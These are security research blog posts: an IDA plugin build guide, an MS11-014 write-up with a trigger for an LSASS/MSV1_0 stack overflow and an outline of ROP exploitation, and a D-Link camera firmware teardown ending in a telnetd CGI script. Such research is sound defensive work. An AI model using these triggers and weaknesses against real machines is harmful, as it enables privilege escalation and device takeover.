<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2. Run the compilation script:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ chmod 755 bin/idamake.pl</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ bin/idamake.pl</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If the latter command did not return any error, you are all set!</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compiling a plugin</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let’s take findcrypt2 plugin as an example.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compiling 32-bit Mac OS X version:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ cd ~/idasdk65/plugins/findcrypt2</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ make</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ file ~/idasdk65/bin/plugins/findcrypt.pmc </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">~/Users/newsoft/idasdk65/bin/plugins/findcrypt.pmc: Mach-O dynamically linked shared library i386</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Compiling 64-bit Mac OS X version:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ export __EA64__=1</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ cd ~/idasdk65/plugins/findcrypt2</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ make</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ file ~/idasdk65/bin/plugins/findcrypt.pmc64 </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">~/Users/newsoft/idasdk65/bin/plugins/findcrypt.pmc64: Mach-O dynamically linked shared library i386</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I made both binaries are available for download [<a href="http://newsoft.dyndns.org/findcrypt.pmc">32-bit</a>] [<a href="http://newsoft.dyndns.org/findcrypt.pmc64">64-bit</a>].</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Note: IDA64 is actually a 32-bit application that handles 64-bit files - therefore plugins for IDA64 are also expected to be 32-bit libraries. Defining </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">__X64__</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> at compile-time will actually build a full 64-bit library, but that should be useful for building debugger modules only.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Wrapping up</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This documentation is provided in “worked for me” license.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I might provide limited support for this, but be sure to provide me with very detailed error messages. And please do not ask for “leaked” IDA or IDA SDK versions.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the end, the whole process sounds really awkward. If anybody knows of a better solution to do it, feel free to share!</span></div>
newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com5tag:blogger.com,1999:blog-26480225.post-83338166791706088472012-01-10T22:45:00.000+01:002012-01-10T22:45:01.388+01:00MS11-014: this is not the bug your are looking for …<h3>
Intro</h3>
<div align="justify">
It could be believed that patch management was an outdated topic for year 2011. However, I have still been asked by a client to challenge their internal patch management policy by delivering a working exploit faster than the <i>XX</i>-day period they waited before patch deployment (<i>XX</i> being somewhere between 10 and 99 - I love random figures like this ;).<br />
<br />
This event occurred in February 2011. Having a look at the <a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-feb">gorgeous monthly Microsoft release</a>, we decided to target <a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-014">MS11-014</a> (“<i>Vulnerability in Local Security Authority Subsystem Service Could Allow Local Elevation of Privilege </i>”), since local bugs are usually easier to exploit reliably.<br />
<br /></div>
<div align="justify">
As this story occurred one year ago, I assume that everybody had enough time to patch. And local exploits are not “wormable”, therefore releasing this information will <i>not</i> result in the end of Internet.</div>
<h3>
Patch analysis</h3>
<div align="justify">
The patch itself is <a href="http://autodiff.piotrbania.com/get_diff.php?diff_id=44">piece of cake</a>: only <span style="font-family: 'Courier New';">LSASRV.DLL</span> has changed, and only 2 functions have changed within that DLL.<br />
<br /></div>
<div align="justify">
<span style="font-family: 'Courier New';">FMyPrimitiveHMACParam()</span> only had a few extra NOPs added.<br />
<br /></div>
<div align="justify">
On the other hand, <span style="font-family: 'Courier New';">NegpMapLogonRequest()</span> is an excellent candidate, for an extra size check has been added (as shown below in <b><span style="color: red;">bold red</span></b>) – sorry for providing unformatted <a href="http://www.hex-rays.com/products/decompiler/index.shtml">Hex-Rays</a> pseudo-code, I know it is lame ;)<br />
<br /></div>
<span style="font-family: 'Courier New';">signed int __stdcall NegpMapLogonRequest(char *a1, void *a2, unsigned int a3, struct _MSV1_0_INTERACTIVE_LOGON **a4) </span><span style="font-family: 'Courier New';">{</span><br />
<span style="font-family: 'Courier New';">(…)</span><br />
<span style="font-family: 'Courier New';"> if ( v6 > 0x100u || *(_WORD *)v5 > 0x100u</span><br />
<span style="font-family: 'Courier New';"><strong> <span style="color: red;">|| (v7 = *((_WORD *)a1 + 2), v7 > 0x1FEu)</span></strong> )</span><br />
<span style="font-family: 'Courier New';"> return -1073741562;</span><br />
<span style="font-family: 'Courier New';">(…)</span><br />
<span style="font-family: 'Courier New';">}</span><br />
<span style="font-family: 'Courier New';"><br /></span><br />
<div align="justify">
<span style="font-family: 'Courier New';">a1</span> is not really a <span style="font-family: 'Courier New';">char*</span> but rather a <span style="font-family: 'Courier New';">LSA_UNICODE_STRING</span>, defined as such:<br />
<br /></div>
<span style="font-family: 'Courier New';">typedef struct _LSA_UNICODE_STRING {</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> USHORT Length;</span><br />
<span style="font-family: 'Courier New';"> USHORT MaximumLength;</span><br />
<span style="font-family: 'Courier New';"> PWSTR Buffer;</span><br />
<span style="font-family: 'Courier New';">} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;</span><br />
<span style="font-family: 'Courier New';"><br /></span><br />
<div align="justify">
<span style="font-family: 'Courier New';">NegpMapLogonRequest()</span> has two direct callers: <span style="font-family: 'Courier New';">NegpCloneLogonSession()</span> and <span style="font-family: 'Courier New';">NegpIsLocalOrNetworkService()</span>, which is in turn called from <span style="font-family: 'Courier New';">NegLogonUserEx2()</span>.<br />
<br /></div>
<div align="justify">
Those APIs are internal to LSASS, and are exposed to other processes through <a href="http://recon.cx/2008/a/thomas_garnier/LPC-ALPC-slides.pdf">loosely documented</a> LPC calls. The easiest way to trigger that piece of code from any process is to rely on the official <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa378189(v=vs.85).aspx">LogonUserEx</a> API.</div>
<h3>
Debugging LSASS</h3>
<div align="justify">
Debugging LSASS locally can be tricky, for it is a critical system process that is involved in the debugging subsystem itself. Do not expect to be able to attach <a href="http://ollydbg.de/">OllyDbg</a> and go away with it … The easiest way to do it seems to rely on the Kernel Debugger itself, which has also the <a href="http://www.nynaeve.net/?p=136">ability to debug any userland process</a>.<br />
<br /></div>
<div align="justify">
That being done, WinDbg confirms that our target function is indirectly called from <span style="font-family: 'Courier New';">LogonUserEx()</span> indeed, plus the offending string is the <i>user-supplied domain name</i> …<br />
<br /></div>
<span style="font-family: 'Courier New';">kd> kv</span><br />
<span style="font-family: 'Courier New';">ChildEBP RetAddr</span><br />
<span style="font-family: 'Courier New';">00acfc8c 757434c5 </span><span style="font-family: 'Courier New';">LSASRV!NegpMapLogonRequest</span><br />
<span style="font-family: 'Courier New';">00acfcb4 75742e41 </span><span style="font-family: 'Courier New';">LSASRV!NegpIsLocalOrNetworkService+0x2f</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';">00acfcf8 75742891 LSASRV!NegLogonUserEx2+0xaa</span><br />
<span style="font-family: 'Courier New';">00acfe98 757422ae LSASRV!LsapAuApiDispatchLogonUser+0x33b</span><br />
<span style="font-family: 'Courier New';">00acfeac 75739481 LSASRV!LpcLsaLogonUser+0x22</span><br />
<span style="font-family: 'Courier New';">00acfec4 757393a5 LSASRV!DispatchAPI+0x46</span><br />
<span style="font-family: 'Courier New';">00acff50 75738cfa </span><span style="font-family: 'Courier New';">LSASRV!LpcHandler+0x153</span><br />
<span style="font-family: 'Courier New';">00acff74 75738dbe LSASRV!SpmPoolThreadBase+0xb9</span><br />
<span style="font-family: 'Courier New';">00acffb4 7c80b729 LSASRV!LsapThreadBase+0x91</span><br />
<span style="font-family: 'Courier New';">00acffec 00000000 kernel32!BaseThreadStart+0x37</span><br />
<div align="justify">
<br />
Wait … does it mean that calling <span style="font-family: 'Courier New';">LogonUserEx()</span> with a domain name over 0x200 characters is enough to trigger that bug ? Unfortunately not: <i>because there is no bug</i> … The logon triplet (username, domain, password) will be rejected as invalid – which it is.</div>
<h3>
Where is the meat?</h3>
<div align="justify">
There is still one missing piece in the puzzle: where is the bug? No vulnerable string copy is to be found anywhere within <span style="font-family: 'Courier New';">LSASRV.DLL</span>. And providing an oversized domain name will <i>not</i> result in any crash.<br />
<br /></div>
<div align="justify">
At this point, there are two possible ways to go: one is hard work. The other is <s>laziness</s> efficiency. As <a href="http://pt.linkedin.com/in/jorgemoura">Jorge Moura</a> (from <a href="http://www.primaverabss.com/">Primavera BSS</a>) is credited for the discovery, I emailed him. Not only did he respond over the night, but he also provided me with a test vector. Which turns to be something like:<br />
<br /></div>
<span style="font-family: 'Courier New';">LogonUser(</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> _T("SomeUsername"),</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> (TCHAR*)domain,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> _T("SomePassword"),</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> LOGON32_LOGON_NEW_CREDENTIALS, // defined as 9</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> LOGON32_PROVIDER_DEFAULT, // defined as 0</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> &hToken </span><span style="font-family: 'Courier New';">);</span><br />
<span style="font-family: 'Courier New';">(…)</span><br />
<span style="font-family: 'Courier New';">ImpersonateLoggedOnUser( hToken );</span><br />
<span style="font-family: 'Courier New';">(…)</span><br />
<span style="font-family: 'Courier New';">CreateFile( <br /> </span><span style="font-family: 'Courier New';">_T(\\\\127.0.0.1\\c$\\boot.ini),</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> GENERIC_READ,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> FILE_SHARE_READ|FILE_SHARE_WRITE,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> NULL, // security attributes</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> OPEN_EXISTING,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> FILE_ATTRIBUTE_NORMAL,</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';"> NULL</span><br />
<span style="font-family: 'Courier New';"></span><span style="font-family: 'Courier New';">);</span><br />
<span style="font-family: 'Courier New';"><br /></span><br />
<div align="justify">
The trick is to specify the <span style="font-family: 'Courier New';">LOGON32_LOGON_NEW_CREDENTIALS</span> flag, which has the following effect:<br />
<br /></div>
<div align="justify">
“<i>This logon type allows the caller to clone its current token and specify new credentials for outbound connections. The new logon session has the same local identifier but uses different credentials for other network connections.</i>”<br />
<br /></div>
<div align="justify">
In that case, new credentials are not immediately checked, but rather stored “as is” in memory for future use. And the crash occurs when the authentication package – namely <span style="font-family: 'Courier New';">MSV1_0.DLL</span> – makes use of those new credentials.<br />
<br /></div>
<div align="justify">
Vulnerable function is <span style="font-family: 'Courier New';">SspMapContext()</span> in which lies an unbounded, inlined <span style="font-family: 'Courier New';">memcpy()</span>. Destination is the local function stack … What else? ;)</div>
<h3>
Exploitation details</h3>
<div align="justify">
Despite being a “classical”, size-unlimited, Unicode stack overflow, generic exploitation of this bug can be tricky on an up-to-date Windows XP SP3 target.<br />
<br /></div>
<div align="justify">
LSASS process and all Microsoft-provided DLLs that are loaded by default within that process benefit from PEB and stack randomization, are flagged as <a href="http://msdn.microsoft.com/en-us/library/ms235442(v=vs.80).aspx">/NXCOMPAT</a> and <a href="http://msdn.microsoft.com/en-us/library/9a89h429(v=vs.80).aspx">/SAFESEH</a>. The offending function is itself protected by a stack cookie (as a result of <a href="http://msdn.microsoft.com/en-us/library/8dbf701c(v=vs.80).aspx">/GS</a> option). Exploitation is one-shot, since LSASS process death will notoriously result in a forced system reboot.<br />
<br /></div>
<div align="justify">
During that particular assignment, it turned out that Symantec (ex-Sygate) personal firewall also loads <span style="font-family: 'Courier New';">SYSFER.DLL</span> (version 1.0.0 at that time – if it means something) into LSASS address space. As this DLL has been compiled <i>without any security option</i>, and given that Windows XP does not provide any ASLR for code mappings, this DLL has been used as a gadget provider for ROP-like exploitation. After some <a href="http://code.google.com/p/smiasm/">MIASM</a> magic, all client boxes were reliably 0wn3d – thanks to Symantec security products being installed ;)</div>
<h3>
Outro (a.k.a. TL;DR)</h3>
In summary:<br />
<ul>
<li> <div align="justify">
The effective bug has <i>not</i> been fixed. Any other API that would allow passing an oversized domain name to LSASS could result in triggering the very same bug within MSV1_0.</div>
</li>
<li> <div align="justify">
Leave figures to risk managers and top-level management only. It makes no sense trying to define metrics such as “days before public exploit”, when unqualified exploit writers can provide a reliable attack vector within 2 days – not to mention all the people who had access to this flaw before public release. And after one year, this issue is still marked as “no public exploit available” on <a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-feb">Microsoft summary page</a>.</div>
</li>
<li> <div align="justify">
According to the original discoverer, such a trivial bug (think: <i>oversized domain name provided during user authentication</i>) was found by accident during a software QA session.</div>
</li>
<li> <div align="justify">
According to Microsoft security bulletin, this bug only affects Windows XP and Windows 2003. It is assumed (without checking) that <a href="http://blogs.msdn.com/b/sdl/archive/2007/04/26/lessons-learned-from-the-animated-cursor-security-bug.aspx">memcpy()</a> has eventually been <a href="http://blogs.msdn.com/b/sdl/archive/2009/05/14/please-join-me-in-welcoming-memcpy-to-the-sdl-rogues-gallery.aspx">defined as dangerous</a> and replaced as much as possible by <a href="http://msdn.microsoft.com/en-us/library/wes2t00f(v=vs.80).aspx">memcpy_s()</a>. Is Microsoft aware of the number of security issues it killed? Who knows …</div>
</li>
</ul>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com5tag:blogger.com,1999:blog-26480225.post-28474528069350096692010-09-27T08:00:00.007+01:002010-09-27T08:00:03.794+01:00D-Link DCS-2121 and the state of embedded security<span class="Apple-style-span" style="font-size: x-large;"><b>Introduction</b></span><br />
<br />
I recently bought a <a href="http://www.dlink.com.sg/products/?idproduct=310">D-Link DCS-2121</a> surveillance camera. This is good stuff:<br />
<ul><li>Megapixel camera + microphone + speaker</li>
<li>WiFi, UPnP and dynamic DNS supported</li>
<li>Web and Mobile Web access to streaming data</li>
<li>Motion detection</li>
<li>SDCard recording</li>
</ul>It is also an embedded system running Linux operating system; therefore I decided to have a look at it ;) A firmware upgrade is available <a href="http://www.dlink.com.sg/support/support_detail.asp?idproduct=310">here</a> (version 1.04 at the time of writing), which is very convenient for further analysis.<br />
<br />
<span class="Apple-style-span" style="font-size: x-large;"><b>Firmware analysis</b></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
$ wget http://www.dlink.com.sg/support/Support_download.asp?idsupport=745<br />
(...)<br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ unzip dcs-2121_fw_1.04_3227.zip<br />
Archive: dcs-2121_fw_1.04_3227.zip<br />
inflating: DCS-2102_DCS-2121_A1_FW_1.04_3227.bin<br />
inflating: DCS-2121_A1_Release Note_forFW1.04-3227.txt<br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ file DCS-2102_DCS-2121_A1_FW_1.04_3227.bin<br />
DCS-2102_DCS-2121_A1_FW_1.04_3227.bin: POSIX shell script text executable</span></span><br />
<br />
Yes, firmware is … a shell script file! In fact, this file is broken into two parts:<br />
<ul><li>A shell script</li>
<li>A binary blob</li>
</ul><div class="separator" style="clear: both; text-align: center;"><a href="http://newsoft.dyndns.org/tech/DCS_firmware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://newsoft.dyndns.org/tech/DCS_firmware.png" /></a></div><br />
The shell script is very small - interesting parts are the following:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">BLOCKS="norboot.bin(0x10000,65536),vmlinuz(0x60000,1048576),cram_image(0x160000,0x5E0000),autoboot.bin(0x2000,8192)"</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">extract() {</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"># tarLine will be replaced with a real number by Makefile</span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">tail -n +153 "$1"</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">}</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">extract "$self" | ddPack - || exit 1</span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">(...)</span></span><br />
<br />
"ddPack" is a custom application. Nevertheless we gained some insights about memory layout, and we know that a <a href="http://en.wikipedia.org/wiki/Cramfs">CramFS filesystem</a> is used.<br />
<br />
CramFS "magic" bytes are 0x28cd3d45 - they are very easy to locate within the firmware (beware of endianness). Actual offset may vary - depending of the firmware localization (D-Link provides regional builds of the same version).<br />
<br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ dd if=DCS-2102_DCS-2121_A1_FW_1.04_3227.bin of=cramfs bs=1138213 skip=1</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">5+1 records in</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">5+1 records out</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">6168576 bytes (6.2 MB) copied, 0.0210627 s, 293 MB/s</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ file cramfs</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">cramfs: Linux Compressed ROM File System data, little endian size 5791744 version #2 sorted_dirs CRC 0x70c14953, edition 0, 3603 blocks, 1199 files</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">$ sudo mount -o loop,ro cramfs /mnt/loop/</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">ls /mnt/loop/</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">bin dev etc lib linuxrc mnt opt proc sbin scripts tmp usr var</span></span><br />
<br />
We now have full read access to the firmware, which leads to interesting discoveries. According to copyright strings, the camera itself is built around the <a href="http://www.prolific.com.tw/eng/Products.asp?ID=74">Prolific PL-1029</a> "System On a Chip". Many CGI files under "/var/www" are calling eval() with user-supplied parameters. There is also a promising "/var/www/cgi/admin/telnetd.cgi" script :)<br />
<br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#!/bin/sh</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># get current setting from tdb</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># format looks like VariableName_type</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">onGetSetting() {</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> result=""</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># make sure, ...</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># 1. $result is set</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># 2. variables in dumpXml are all set</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">onUpdateSetting() {</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> result="ok"</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> if [ "$command" = "on" ]; then</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> /usr/sbin/telnetd 1>/dev/null 2>/dev/null</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> else</span></span><br />
